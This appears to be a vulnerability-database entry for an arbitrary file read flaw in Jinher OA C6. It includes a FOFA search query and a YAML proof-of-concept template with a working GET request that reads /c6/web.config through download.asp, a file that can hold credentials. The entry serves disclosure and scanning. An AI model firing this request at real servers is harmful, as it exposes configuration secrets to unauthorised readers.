jinher-oa-c6-download-file-read: 金和OA C6 download.jsp 任意文件读取漏洞

2025-08-01 jinher oa c6 PoC Public

Description

金和OA C6 download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息

fofa: app="金和网络-金和OA"

PoC

id: jinher-oa-c6-download-file-read

info:
  name: 金和OA C6 download.jsp 任意文件读取漏洞
  author: zan8in
  severity: high
  description: |-
    金和OA C6 download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息
    fofa: app="金和网络-金和OA"
  tags: jinher,oa,fileread
  created: 2024/02/29

rules:
  r0:
    request:
      method: GET
      path: /C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
    expression: response.status == 200 && response.body.bcontains(b'<configuration>') && response.body.bcontains(b'<configSections>')
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities